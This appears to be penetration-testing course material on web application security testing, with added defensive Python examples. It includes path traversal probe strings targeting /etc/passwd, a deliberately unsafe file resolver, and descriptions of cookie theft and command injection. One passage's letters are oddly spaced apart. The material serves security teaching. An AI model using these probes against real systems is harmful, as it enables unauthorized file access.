[Slide: Configuration Management Testing. Flow: START → Perform SSL/TLS testing (disclosure of confidential information) → Perform infrastructure configuration management testing (source code of the application) → Perform application configuration management testing (information in the source code, log files, and default error codes) → Test for file extensions handling (confidential information about access credentials) → Verify the presence of old, backup, and unreferenced files (source code, installation paths, passwords for applications and databases) → Test for infrastructure and application admin interfaces (admin interfaces can be found to gain access to admin functionality) → Test for HTTP methods and XST (credentials of legitimate users)]
Configuration Management Testing
Once you have gathered information about the web application environment, test the configuration management. This is important because improper configuration may allow unauthorized users to break into the web application.
Step 1: Perform SSL/TLS testing
SSL/TLS testing allows you to identify the ports associated with SSL/TLS-wrapped services. You can do this with the help of tools such as Nmap and Nessus. This test reveals where confidential information may be disclosed.
Step 2: Perform infrastructure configuration management testing
Perform network scanning and analyze web server banners; this can reveal the source code of the application.
Step 3: Perform application configuration management testing
Test the application configuration management using CGI scanners and by reviewing the contents of the web server, application server, comments, configuration, and logs. This gives you information about the source code, log files, and default error codes.
Step 4: Test for file extensions handling
Use vulnerability scanners, spidering and mirroring tools, search engine queries, or manual inspection to test for file extensions handling. This may reveal confidential information about access credentials.
Step 5: Verify the presence of old, backup, and unreferenced files
Review the source code and enumerate application pages and functionality to verify the presence of old, backup, and unreferenced files. These may reveal installation paths and passwords for applications and databases.
Step 6: Test for infrastructure and application admin interfaces
Perform directory and file enumeration, review server and application documentation, etc. to test for infrastructure and application admin interfaces. Admin interfaces can be used to gain access to the admin functionality.
Step 7: Test for HTTP methods and XST
Review the OPTIONS HTTP method using Netcat or Telnet to test for HTTP methods and XST (cross-site tracing). This may reveal the credentials of legitimate users.
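As an added example (not code from the module) covering both the HEAD/OPTIONS analysis step of information gathering and the HTTP methods/XST step here, the following Python parses two constructed raw responses, extracts the fingerprinting headers, and flags advertised methods such as TRACE that should be disabled; the server and PHP version strings are made up.

```python
"""Analyse raw HEAD and OPTIONS responses for what they disclose.

Added example (not code from the module) for the HEAD/OPTIONS analysis step
and the HTTP methods / XST step. Both responses below are constructed
samples; the server and PHP version strings in them are made up.
"""

# Constructed sample: a HEAD response from the application's front page.
SAMPLE_HEAD_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Mon, 01 Jan 2024 00:00:00 GMT\r\n"
    "Server: Apache/2.2.22 (Ubuntu)\r\n"
    "X-Powered-By: PHP/5.3.10\r\n"
    "Set-Cookie: PHPSESSID=abc123; path=/\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
)

# Constructed sample: an OPTIONS response that still advertises TRACE.
SAMPLE_OPTIONS_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.2.22 (Ubuntu)\r\n"
    "Allow: GET,HEAD,POST,OPTIONS,TRACE\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

# Methods a production web application should not advertise: TRACE/TRACK
# enable cross-site tracing (XST), PUT/DELETE allow content manipulation,
# CONNECT can turn the server into a proxy.
RISKY_METHODS = {"TRACE", "TRACK", "PUT", "DELETE", "CONNECT"}

# Headers that leak the server software, framework or platform version.
FINGERPRINT_HEADERS = ("server", "x-powered-by", "x-aspnet-version",
                       "x-generator")


def parse_response(raw):
    """Split a raw HTTP/1.x response into (status_code, headers).

    Header names are lower-cased; a header repeated in the response has its
    values joined with ', '. The body, if any, is ignored.
    """
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    parts = lines[0].split(" ", 2)
    if len(parts) < 2 or not parts[1].isdigit():
        raise ValueError("malformed status line: %r" % lines[0])
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        name, value = name.strip().lower(), value.strip()
        headers[name] = value if name not in headers else headers[name] + ", " + value
    return int(parts[1]), headers


def fingerprint(headers):
    """Technology details disclosed by a HEAD response's headers."""
    disclosed = {name: headers[name] for name in FINGERPRINT_HEADERS
                 if name in headers}
    # The session cookie name is a fingerprint too (PHPSESSID, JSESSIONID,
    # ASP.NET_SessionId each point at a platform).
    cookie = headers.get("set-cookie", "")
    if "=" in cookie:
        disclosed["session-cookie-name"] = cookie.split("=", 1)[0].strip()
    return disclosed


def allowed_methods(headers):
    """Methods advertised in the Allow header of an OPTIONS response."""
    return [m.strip().upper() for m in headers.get("allow", "").split(",")
            if m.strip()]


def risky_methods(headers):
    """Advertised methods that should be disabled on the server.

    Allow only reports what the server claims; confirm each finding by
    sending the method itself (with Netcat or Telnet, as the text says)
    and checking that it is actually refused.
    """
    return sorted(set(allowed_methods(headers)) & RISKY_METHODS)


def xst_exposed(headers):
    """True when TRACE or TRACK is advertised: the cross-site tracing risk."""
    return bool({"TRACE", "TRACK"} & set(allowed_methods(headers)))


if __name__ == "__main__":
    _status, head_headers = parse_response(SAMPLE_HEAD_RESPONSE)
    print("fingerprint:", fingerprint(head_headers))
    _status, opt_headers = parse_response(SAMPLE_OPTIONS_RESPONSE)
    print("allowed:", allowed_methods(opt_headers))
    print("risky:", risky_methods(opt_headers), "XST:", xst_exposed(opt_headers))
```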
[Slide: Authentication Testing. Flow: START → Test for vulnerable remember password and password reset (authentication vulnerabilities) → Test for logout and browser cache management (authentication vulnerabilities) → Test for CAPTCHA → Test for multiple factors authentication (multiple factors authentication vulnerabilities) → Test for race conditions (race conditions)]
Authentication Testing
You need to perform the following steps to carry out authentication testing:
Step 1: Test for vulnerable "remember password" and password reset
Test for a vulnerable "remember password" feature and password reset by attempting to reset passwords by guessing, social engineering, or cracking the secret questions, if used. Check whether a "remember my password" mechanism is implemented by checking the HTML code of the login page; through this, password and authentication weaknesses can be uncovered.
Step 2: Test for logout and browser cache management
Check whether it is possible to "reuse" a session after logout. Also check whether the application automatically logs out a user when that user has been idle for a certain amount of time, and that no sensitive data remains stored in the browser cache.
Step 3: Test for CAPTCHA
Identify all parameters that are sent in addition to the decoded CAPTCHA value from the client to the server, and try to send an old decoded CAPTCHA value with an old CAPTCHA ID of an old session ID. This helps you determine authentication vulnerabilities.
Step 4: Test for multiple-factor authentication
Check whether users hold a hardware device of some kind in addition to the password. Check whether the hardware device communicates directly and independently with the authentication infrastructure using an additional communication channel.
Step 5: Test for race conditions
Attempt to force a race condition: make multiple simultaneous requests while observing the outcome for unexpected behavior. Perform code review to check whether there is a chance of race conditions.
[Slide: Session Management Testing. Flow: START → Test for session management schema (cookie tampering results in hijacking the sessions of legitimate users) → Test for cookie attributes (cookie information to hijack a valid session) → Test for session fixation (attacker could steal the user session, session hijacking) → Test for exposed session variables (confidential information of session token leads to a replay session attack) → Test for CSRF (Cross Site Request Forgery) (compromises end user data and operation or entire web application)]
Session Management Testing
After testing the configuration management, test how the application manages the session. The following are the steps to conduct session management pen testing:
Step 1: Test for session management schema
Collect a sufficient number of cookie samples, analyze the cookie generation algorithm, and forge a valid cookie in order to perform the attack. This allows you to test your application against cookie tampering, which results in hijacking the sessions of legitimate users.
Step 2: Test for cookie attributes
Test for cookie attributes using intercepting proxies such as WebScarab, Burp Proxy, OWASP ZAP, or traffic-intercepting browser plugins such as TamperIE (for IE) and Tamper Data (for Firefox). If you are able to retrieve cookie information, you can use it to hijack a valid session.
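The following Python is an added example (not from the module) for Steps 1 and 2: it parses constructed Set-Cookie headers to report missing Secure, HttpOnly and SameSite attributes, and compares constructed samples of session IDs from a counter-style generator with ones from a random generator to show how predictability is detected; the cookie name SESSIONID is made up.

```python
"""Audit session cookies: attribute flags and session ID predictability.

Added example (not code from the module) for the session management schema
and cookie attribute steps. Every Set-Cookie header and token value below is
a constructed sample; the cookie name SESSIONID is made up.
"""
import math
from collections import Counter

# Constructed samples: a weak session cookie next to a hardened one.
WEAK_COOKIE = "SESSIONID=00000a1; Path=/; Expires=Wed, 01 Jan 2031 00:00:00 GMT"
HARDENED_COOKIE = ("SESSIONID=e4d1a9f07b3c5862a0f9c4e7d21b6853; Path=/; "
                   "Secure; HttpOnly; SameSite=Lax")

# Constructed samples of session IDs collected over several logins: the
# first set comes from a counter-style generator, the second from a CSPRNG.
WEAK_TOKENS = ["00000a1", "00000a2", "00000a3", "00000a4"]
STRONG_TOKENS = [
    "e4d1a9f07b3c5862a0f9c4e7d21b6853",
    "5a0c2f7e9b1d4836c7e2a5f098d1b43e",
    "b83f6a1d0e7c2954f1a6d3c8e05b7f29",
    "9f3c7e1a4b8d2056c7a1e3f5b9d04c62",
]


def parse_set_cookie(header):
    """Parse one Set-Cookie value into (name, value, attributes).

    attributes maps lower-cased attribute names to their value, or to True
    for flag attributes such as Secure and HttpOnly.
    """
    parts = [p.strip() for p in header.split(";")]
    if "=" not in parts[0]:
        raise ValueError("cookie pair missing '=': %r" % header)
    name, value = parts[0].split("=", 1)
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        if "=" in part:
            key, val = part.split("=", 1)
            attrs[key.strip().lower()] = val.strip()
        else:
            attrs[part.lower()] = True
    return name.strip(), value.strip(), attrs


def cookie_findings(header):
    """Weak attribute settings on a session cookie, as finding strings."""
    name, _value, attrs = parse_set_cookie(header)
    findings = []
    if "secure" not in attrs:
        findings.append("%s: missing Secure (also sent over plain HTTP)" % name)
    if "httponly" not in attrs:
        findings.append("%s: missing HttpOnly (readable by injected script)" % name)
    if str(attrs.get("samesite", "")).lower() not in ("lax", "strict"):
        findings.append("%s: SameSite not Lax/Strict (CSRF exposure)" % name)
    if "expires" in attrs or "max-age" in attrs:
        findings.append("%s: persistent cookie (outlives the browser session)" % name)
    if "domain" in attrs:
        findings.append("%s: Domain set (shared with every subdomain)" % name)
    return findings


def shannon_entropy_bits(tokens):
    """Per-character Shannon entropy of the pooled token characters, in bits.

    Hex tokens from a good generator approach 4 bits per character; a
    zero-padded counter scores far lower.
    """
    counts = Counter("".join(tokens))
    total = sum(counts.values())
    return -sum(c / total * math.log2(c / total) for c in counts.values())


def looks_sequential(tokens):
    """True when the tokens, read as hex integers, step by one constant.

    That is the signature of a counter-based generator: with a few samples
    in hand the next session ID is trivial to guess.
    """
    try:
        values = [int(t, 16) for t in tokens]
    except ValueError:
        return False
    diffs = [b - a for a, b in zip(values, values[1:])]
    return len(diffs) >= 2 and len(set(diffs)) == 1 and diffs[0] != 0


if __name__ == "__main__":
    for header in (WEAK_COOKIE, HARDENED_COOKIE):
        print(parse_set_cookie(header)[0], cookie_findings(header) or "no findings")
    for label, tokens in (("weak", WEAK_TOKENS), ("strong", STRONG_TOKENS)):
        print(label, "entropy=%.2f bits/char" % shannon_entropy_bits(tokens),
              "sequential=%s" % looks_sequential(tokens))
```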
Step 3: Test for session fixation
To test for session fixation, make a request to the site to be tested and analyze vulnerabilities using the WebScarab tool. This helps you determine whether your application is vulnerable to session hijacking.
Step 4: Test for exposed session variables
Confidential information in the session token leads to a session replay attack. Therefore, test for exposed session variables by inspecting encryption and reuse of the session token, proxies and caching, GET and POST, and transport vulnerabilities.
Step 5: Test for CSRF (Cross-Site Request Forgery)
Examine the URLs in the restricted area to test for CSRF. A CSRF attack compromises end-user data and operations or the entire web application.
[Slide: Authorization Testing. Flow: START → Test for path traversal (can gain access to reserved information) → Test for bypassing authorization schema → Test for role/privilege manipulation]
Authorization Testing
Follow these steps to test the web application against authorization vulnerabilities:
Step 1: Test for path traversal
Test for path traversal by performing input vector enumeration and analyzing the input validation functions present in the web application. Path traversal allows attackers to gain access to reserved information.
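As an added example (not code from the module), the following Python shows the kind of input validation function a path traversal test targets: an unsafe file resolver beside a hardened one, both fed a constructed list of traversal probes; function names, the probes and the temporary document root are assumptions, and the behaviour shown is for a POSIX file system.

```python
"""Path traversal: an unsafe file resolver beside a hardened one.

Added example (not code from the module) for the path traversal testing
step. Function names, the probe list and the temporary document root are
assumptions for illustration; behaviour is for a POSIX file system.
"""
import os
import tempfile
from pathlib import Path
from urllib.parse import unquote

# Constructed probe values a tester feeds the file-name parameter during
# input vector enumeration; a sound validation routine rejects all of them.
TRAVERSAL_PROBES = [
    "../etc/passwd",                  # plain dot-dot
    "..\\..\\windows\\win.ini",       # backslash separators
    "%2e%2e/%2e%2e/etc/passwd",       # URL-encoded dots
    "..%2f..%2fetc%2fpasswd",         # URL-encoded slashes
    "%252e%252e/etc/passwd",          # double-encoded dots
    "/etc/passwd",                    # absolute path
    "reports/../../secret.txt",       # traversal after a valid prefix
    "index.html%00.txt",              # null byte truncation attempt
]


def resolve_unsafe(docroot, requested):
    """Vulnerable: joins the user-supplied name onto the document root.

    os.path.join drops docroot entirely when 'requested' is absolute, and
    '..' segments walk out of it, so this reaches any file the process can
    read. Kept here only to show what the probes do to such code.
    """
    return os.path.normpath(os.path.join(docroot, requested))


def resolve_safe(docroot, requested):
    """Hardened: decode, canonicalise, then refuse anything outside the root.

    Returns the absolute path inside docroot, or None for a rejected request.
    The containment check runs on the fully resolved path, so encoded dots,
    backslashes and symlinks are all caught by one comparison.
    """
    decoded = unquote(unquote(requested))        # undo double encoding as well
    decoded = decoded.replace("\\", "/")          # treat backslash as a separator
    if "\x00" in decoded or decoded.startswith("/"):
        return None                               # null bytes and absolute paths
    root = Path(docroot).resolve()
    candidate = (root / decoded).resolve()
    try:
        candidate.relative_to(root)               # raises when outside docroot
    except ValueError:
        return None
    return str(candidate)


def escapes_root(docroot, resolved):
    """True when 'resolved' lies outside 'docroot' (grades the unsafe resolver)."""
    try:
        Path(resolved).resolve().relative_to(Path(docroot).resolve())
    except ValueError:
        return True
    return False


def run_probes(docroot=None):
    """Feed every probe to both resolvers.

    Returns {probe: (unsafe_escaped, safe_result)}; a fresh empty temporary
    directory stands in for the document root when none is given.
    """
    if docroot is None:
        docroot = tempfile.mkdtemp(prefix="docroot-")
    results = {}
    for probe in TRAVERSAL_PROBES:
        unsafe_escaped = escapes_root(docroot, resolve_unsafe(docroot, probe))
        results[probe] = (unsafe_escaped, resolve_safe(docroot, probe))
    return results


if __name__ == "__main__":
    for probe, (escaped, safe) in run_probes().items():
        print("%-28s unsafe escapes root: %-5s hardened: %s"
              % (probe, escaped, safe or "rejected"))
```

Probes that the unsafe resolver keeps inside the root (encoded or backslash forms) only show that the join happens before decoding; a web server or framework that decodes first would turn them into the plain dot-dot case.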
S t e p 2: T e s t f o r b y p a s s i n g a u t h o r i z a t i o n s c h e m a
T e s t f o r b y p a s s i n g a u t h o r i z a t i o n s c h e m a b y e x a m i n i n g t h e a d m i n f u n c t i o n a l i t i e s , t o g a i n a c c e s s
t o t h e r e s o u r c e s a s s i g n e d t o a d i f f e r e n t r o l e . If t h e a t t a c k e r s u c c e e d s in b y p a s s i n g t h e
a u t h o r i z a t i o n s c h e m a , h e o r s h e c a n g a i n illegal a c c e s s t o r e s e r v e d f u n c t i o n s / r e s o u r c e s .
S t e p 3: T e s t f o r p r i v i l e g e e s c a l a t i o n
T e s t f o r r o l e / p r i v i l e g e m a n i p u l a t i o n . If t h e a t t a c k e r h a s a c c e s s t o r e s o u r c e s / f u n c t i o n a l i t y , t h e n
h e o r s h e c a n p e r f o r m a p r i v i l e g e e s c a l a t i o n a t t a c k .
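As an added example (not part of the CEH course material), the following Python shows the two server-side checks these steps probe: a path-resolution function that rejects traversal after decoding and normalising the input, and a policy comparison that flags requests the server accepted although the role was not entitled to them. The role table, function names and sample paths are constructed for the illustration.

```python
import posixpath
import urllib.parse

# Constructed sample policy: which roles may invoke which server-side operations.
# (Assumed names; a real application loads this from its access-control config.)
ROLE_PERMISSIONS = {
    "user": {"view_profile", "download_own_file"},
    "admin": {"view_profile", "download_own_file", "list_users", "delete_user"},
}


def safe_resolve(base_dir, user_path):
    """Map a user-supplied relative path onto base_dir, or return None when the
    request would escape it. This is the input-validation function a path
    traversal test exercises: the check runs after one round of percent-decoding
    and after normalising '.' and '..' segments, so an encoded or nested '..'
    cannot slip past a naive substring check."""
    decoded = urllib.parse.unquote(user_path)
    if "\x00" in decoded:                      # NUL can truncate paths in native code
        return None
    cleaned = decoded.replace("\\", "/")       # treat backslash as a separator too
    if cleaned.startswith("/"):                # absolute paths are never acceptable
        return None
    normalised = posixpath.normpath(cleaned)   # "a/../b" -> "b", "./x" -> "x"
    if normalised == ".":
        return base_dir
    if normalised == ".." or normalised.startswith("../"):
        return None                            # still points above base_dir
    return posixpath.join(base_dir, normalised)


def is_authorized(role, operation):
    """Policy decision: is this operation in the role's permission set?"""
    return operation in ROLE_PERMISSIONS.get(role, set())


def authorization_findings(observations):
    """observations: (role, operation, server_allowed) triples recorded while
    replaying each request under each role. Returns the (role, operation) pairs
    the server accepted although the policy denies them, i.e. the authorization
    schema bypasses a tester would report."""
    return [(role, op) for role, op, allowed in observations
            if allowed and not is_authorized(role, op)]
```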
Slide: Data Validation Testing. The flow diagram maps each test to what it can yield: reflected XSS (session cookie information), stored XSS (sensitive information such as session authorization tokens), DOM-based XSS (cookie information and DOM-based XSS vulnerabilities), cross-site flashing (information on DOM-based XSS vulnerabilities), SQL injection (database information), and LDAP injection (sensitive information about users and hosts).
Data Validation Testing
Web applications must employ proper data validation methods. Otherwise, there may be a chance for the attacker to break into the communication between the client and the server, and inject malicious data. Hence, data validation pen testing must be conducted to ensure that the current data validation methods or techniques employed by the web application offer appropriate security. Follow the steps here to perform data validation testing:
Step 1: Test for reflected cross-site scripting
A reflected cross-site scripting attacker crafts a URL to exploit the reflected XSS vulnerability and sends it to the client in a spam mail. If the victim clicks on the link, believing it comes from a trusted server, the malicious script embedded by the attacker in the URL gets executed in the victim's browser and sends the victim's session cookie to the attacker. Using this session cookie, the attacker can steal the sensitive information of the victim. Hence, to avoid this kind of attack you must check your web applications against reflected XSS attacks. If you put proper data validation mechanisms or methods in place, then you can easily determine whether the URL originally came from the server or was crafted by the attacker. Detect and analyze input vectors for potential vulnerabilities, analyze the vulnerability report, and attempt to exploit it. Use tools such as OWASP CAL9000, Hackvertor, BeEF, XSS-Proxy, Backframe, WebScarab, XSS Assistant, and Burp Proxy.
Step 2: Test for stored cross-site scripting
Analyze HTML code, test for Stored XSS, leverage Stored XSS, and verify if the file upload allows setting arbitrary MIME types using tools such as OWASP CAL9000, Hackvertor, BeEF, XSS-Proxy, Backframe, WebScarab, Burp, and XSS Assistant. Stored XSS attacks allow attackers to uncover sensitive information such as session authorization tokens.
Step 3: Test for DOM-based cross-site scripting
DOM XSS attack stands for document object model based cross-site scripting attack, which affects the client's browser script code. In this attack, the input is taken from the user and then some malicious action is performed with it, which in turn leads to the execution of injected malicious code. Web applications can be tested against DOM XSS attacks by performing source code analysis to identify JavaScript coding errors.
Step 4: Test for cross site flashing
Analyze SWF files using tools such as SWFIntruder, Decompiler - Flare, Compiler - MTASC, Disassembler - Flasm, Swfmill, and the Debugger Version of the Flash Plugin/Player. Flawed Flash applications may contain DOM-based XSS vulnerabilities. The test for cross-site flashing gives information on DOM-based cross-site scripting vulnerabilities.
Step 5: Perform SQL injection testing
Perform standard SQL injection testing, union query SQL injection testing, blind SQL injection testing, and stored procedure injection using tools such as OWASP SQLiX, sqlninja, SqlDumper, sqlbftools, SQL Power Injector, etc. SQL injection attacks give database information to the attacker.
Step 6: Perform LDAP injection testing
Use a trial and error approach by inserting '(', '|', and the other characters in order to check the application for errors. Use the tool Softerra LDAP Browser. The LDAP injection may reveal sensitive information about users and hosts.
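As an added example (not part of the CEH course material), the following Python shows the data-validation checks behind steps 1, 5 and 6: reflected output, a SQL lookup and an LDAP filter, each in the unsafe construction a tester looks for beside the validated form. The sample table, function names and probe strings are constructed for the illustration.

```python
import html
import sqlite3


def render_greeting_unsafe(name):
    # Reflects the parameter verbatim into the page: the reflected-XSS condition.
    return "<p>Hello, " + name + "</p>"


def render_greeting_safe(name):
    # HTML-encodes the value so the browser renders it as text, never as markup.
    return "<p>Hello, " + html.escape(name, quote=True) + "</p>"


def build_user_db():
    """Constructed in-memory table standing in for the application's user store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "alice@example.test"), ("bob", "bob@example.test")])
    return conn


def lookup_unsafe(conn, username):
    # String concatenation: the input becomes part of the SQL text, so a quote
    # inside it can change what the WHERE clause means.
    sql = "SELECT username FROM users WHERE username = '" + username + "' ORDER BY username"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, username):
    # Parameter binding: the input is sent as data and cannot alter the query.
    sql = "SELECT username FROM users WHERE username = ? ORDER BY username"
    return [row[0] for row in conn.execute(sql, (username,))]


# RFC 4515 escaping for values placed inside a search filter. The backslash
# must be escaped as well, or the other metacharacters could be smuggled in.
LDAP_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def ldap_escape(value):
    return "".join(LDAP_ESCAPES.get(ch, ch) for ch in value)


def ldap_user_filter(username):
    """Search filter with the user-controlled value escaped, so '(' and '|'
    style probes stay inside the uid assertion instead of adding clauses."""
    return "(&(objectClass=person)(uid=%s))" % ldap_escape(username)
```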
Slide: Data Validation Testing (Cont'd). The flow diagram maps ORM injection to information on SQL injection vulnerabilities, XML injection to information about XML structure, SSI injection to web server CGI environment variables, XPath injection to access to confidential information, and IMAP/SMTP injection to access to the backend mail server.
Data Validation Testing (Cont'd)
Step 7: Perform ORM injection testing
Perform ORM injection testing to discover vulnerabilities of an ORM tool and test web applications that use ORM. Use tools such as Hibernate, Nhibernate, and Ruby On Rails. This test gives information on SQL injection vulnerabilities.
Step 8: Perform XML injection testing
To perform XML injection testing, try to insert XML metacharacters and observe the response. A successful XML injection may give information about XML structure.
Step 9: Perform SSI injection testing
Perform SSI injection testing and find if the web server actually supports SSI directives using tools such as Web Proxy Burp Suite, Paros, WebScarab, String searcher: grep. If the attacker can inject SSI directives, then he or she can set or print web server CGI environment variables.
Step 10: Perform XPath injection testing
Inject XPath code and interfere with the query result. XPath injection allows the attacker to access confidential information.
Step 11: Perform IMAP/SMTP injection testing
Perform IMAP/SMTP injection testing to identify vulnerable parameters. Understand the data flow and deployment structure of the client, and perform IMAP/SMTP command injection. Malicious IMAP/SMTP commands allow attackers to access the backend mail server.
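As an added example (not part of the CEH course material), the following Python shows what steps 8 and 10 look for on the server side: a record built by string formatting beside the escaped form, a structural check that reveals when inserted metacharacters changed the document, and an XPath literal builder for engines that offer no parameter binding. Element names, the record layout and probe strings are constructed for the illustration.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape


def user_record_unsafe(username, role):
    # Input is pasted straight into the markup, so '<', '>', '&' and quotes
    # from the user alter the document structure: the XML injection condition.
    return "<user><name>%s</name><role>%s</role></user>" % (username, role)


def user_record_safe(username, role):
    # escape() turns the metacharacters into entities, so they stay character data.
    return "<user><name>%s</name><role>%s</role></user>" % (escape(username), escape(role))


def parse_user_record(xml_text):
    """Parse one record; return (name, role) or None when the document is not
    well-formed or does not contain exactly one name and one role element.
    Counting elements is the structural check that tells whether the inserted
    metacharacters changed the document rather than just its content."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return None
    names, roles = root.findall("name"), root.findall("role")
    if root.tag != "user" or len(names) != 1 or len(roles) != 1:
        return None
    return names[0].text, roles[0].text


def xpath_literal(value):
    """Render value as an XPath 1.0 string literal that cannot be terminated
    early: single quotes unless the value contains one, double quotes otherwise,
    and concat() when both kinds are present. Use this (or compare values in
    code) whenever the XPath engine has no parameter binding."""
    if "'" not in value:
        return "'%s'" % value
    if '"' not in value:
        return '"%s"' % value
    parts = ["'%s'" % p for p in value.split("'")]
    return "concat(" + ", \"'\", ".join(parts) + ")"


def role_query(username):
    """XPath selecting one user's role, with the name bound as a literal."""
    return "/users/user[name=%s]/role" % xpath_literal(username)
```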
Slide: Data Validation Testing (Cont'd). The flow diagram maps code injection to input validation errors, OS commanding to local data and system information, buffer overflow testing to stack and heap memory information and application control flow, incubated vulnerability testing to server configuration and input validation schemes, and HTTP splitting/smuggling to cookies and HTTP redirect information.
Data Validation Testing (Cont'd)
Step 12: Perform code injection testing
To perform code injection testing, inject code (a malicious URL) and perform source code analysis to discover code injection vulnerabilities. It gives information about input validation errors.
Step 13: Perform OS commanding
Perform manual code analysis and craft malicious HTTP requests using | to test for OS command injection attacks. OS commanding may reveal local data and system information.
Step 14: Perform buffer overflow testing
Perform manual and automated code analysis using tools such as OllyDbg to detect buffer overflow conditions. This may help you to determine stack and heap memory information and application control flow.
Step 15: Perform incubated vulnerability testing
Upload a file that exploits a component in the local user workstation when it is viewed or downloaded by the user, and perform XSS and SQL injection attacks. Incubated vulnerabilities may give information about server configuration and input validation schemes to the attackers.
Step 16: Test for HTTP splitting/smuggling
Identify all user-controlled input that influences one or more headers in the response and check whether an attacker can successfully inject a CR+LF sequence into it. Attackers perform HTTP splitting/smuggling to get cookies and HTTP redirect information.
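As an added example (not part of the CEH course material), the following Python covers steps 13 and 16 from the defender's side: a finding filter that flags request values reaching a response header with a CR or LF after decoding, the header guard that refuses them, and the argv rule that removes the | vector from OS commands. Function names, the hostname pattern and the sample observations are constructed for the illustration.

```python
import re
import subprocess
import sys
import urllib.parse

HOSTNAME_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?")


def header_injection_findings(observations):
    """observations: (parameter, raw_value) pairs taken from requests whose value
    is copied into a response header (Location, Set-Cookie, ...). Returns the
    parameters whose value still contains a CR or LF after one round of
    percent-decoding, which is the condition step 16 checks for."""
    flagged = []
    for param, raw in observations:
        decoded = urllib.parse.unquote(raw)
        if "\r" in decoded or "\n" in decoded:
            flagged.append(param)
    return flagged


def is_safe_header_value(value):
    """Server-side guard for any header built from user input: CR, LF and NUL
    are refused outright, so the value can never end the header early or start
    a second response."""
    return not any(ch in value for ch in "\r\n\x00")


def lookup_argv(host):
    """argv for a host lookup, or None when the value is not a plausible hostname.
    subprocess.run(argv) executes the program directly; with no shell involved,
    '|', ';' and '&&' inside host are just characters of one argument."""
    if not HOSTNAME_RE.fullmatch(host):
        return None
    return ["nslookup", host]


def run_without_shell(value):
    """Demonstrates the argv rule with the interpreter itself as the program:
    the value comes back verbatim, pipe and all, because no shell parsed it."""
    argv = [sys.executable, "-c", "import sys; print(sys.argv[1])", value]
    result = subprocess.run(argv, capture_output=True, text=True, check=True)
    return result.stdout.rstrip("\n")
```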
Slide: Denial-of-Service Testing. The flow diagram maps SQL wildcard attacks to application information, locking customer accounts to login account information, buffer overflows to buffer overflow points, and user-specified object allocation to the maximum number of objects the application can handle.
Denial-of-Service Testing
To check your web application against DoS attacks, follow these steps:
Step 1: Test for SQL wildcard attacks
Craft a query that will not return a result and includes several wildcards. Test manually or employ a fuzzer to automate the process.
Step 2: Test for locking customer accounts
Test that an account does indeed lock after a certain number of failed logins. Find places where the application discloses the difference between valid and invalid logins. If your web application doesn't lock customer accounts after a certain number of failed logins, then there is a possibility for the attacker to crack customer passwords by employing brute force attacks, dictionary attacks, etc.
Step 3: Test for buffer overflows
Perform a manual source code analysis and submit a range of inputs with varying lengths to the application to test for buffer overflows.
Step 4: Test for user specified object allocation
Find where the numbers submitted as a name/value pair might be used by the application code and attempt to set the value to an extremely large numeric value, and then see if the server continues to respond. If the attacker knows the maximum number of objects that the application can handle, he or she can exploit the application by sending objects beyond the maximum limit.
Slide: Denial-of-Service Testing (Cont'd). The flow diagram maps user input as a loop counter to logical errors in an application, writing user-provided data to disk to local disk exhaustion, proper release of resources to programming flaws, and storing too much data in session to session management errors.
Denial-of-Service Testing (Cont'd)
Step 5: Test for user input as a loop counter
Test for user input as a loop counter by entering an extremely large number in the input field that is used by the application as a loop counter. If the application fails to behave in its predefined manner, the application contains a logical error.
Step 6: Write user provided data to disk
Use a script to automatically submit an extremely long value to the server in the request that is being logged.
Step 7: Test for proper release of resources
Identify and send a large number of requests that perform database operations and observe any slowdown or new error messages.
Step 8: Test for storing too much data in session
Create a script to automate the creation of many new sessions with the server and run the request that is suspected of caching the data within the session for each one.
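As an added example (not part of the CEH course material), the following Python shows the server-side behaviour that step 2 and steps 4 and 5 of the DoS tests verify: a login front end that locks an account after a fixed number of failures, answers every failure with the same message, and releases the lock after a window so the lockout itself cannot become a permanent denial of service; and a validator that bounds a user-supplied number before it drives allocation or a loop. The threshold, window, user record and limits are constructed values.

```python
import hmac
import time

MAX_FAILED_LOGINS = 5        # constructed threshold
LOCKOUT_SECONDS = 900        # time-limited, so a lockout cannot be used to lock users out for good
GENERIC_ERROR = "Invalid username or password"   # one text for every failure


class LoginService:
    """Minimal login front end with the two properties step 2 tests for: the
    account locks after MAX_FAILED_LOGINS consecutive failures, and an unknown
    user, a wrong password and a locked account all get the same reply, so the
    response cannot be used to tell valid logins from invalid ones."""

    def __init__(self, users, now=time.time):
        self._users = dict(users)   # username -> password; real systems store a slow hash
        self._failures = {}         # username -> consecutive failures (counted for unknown names too)
        self._locked_until = {}     # username -> time the lock expires
        self._now = now             # injectable clock so the window can be tested

    def attempt(self, username, password):
        now = self._now()
        if self._locked_until.get(username, 0) > now:
            return False, GENERIC_ERROR
        expected = self._users.get(username)
        if expected is not None and hmac.compare_digest(expected.encode(), password.encode()):
            self._failures.pop(username, None)
            return True, "ok"
        count = self._failures.get(username, 0) + 1
        self._failures[username] = count
        if count >= MAX_FAILED_LOGINS:
            self._locked_until[username] = now + LOCKOUT_SECONDS
            self._failures.pop(username, None)
        return False, GENERIC_ERROR

    def is_locked(self, username):
        return self._locked_until.get(username, 0) > self._now()


def validate_count(raw, lower=1, upper=100):
    """Validate a user-supplied number before it becomes an allocation size or a
    loop bound (steps 4 and 5): it must parse as an integer and lie inside a
    range the application can afford. Returns the int, or None to reject;
    rejecting rather than silently clamping keeps the attempt visible in logs."""
    try:
        value = int(str(raw).strip())
    except ValueError:
        return None
    if not lower <= value <= upper:
        return None
    return value
```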
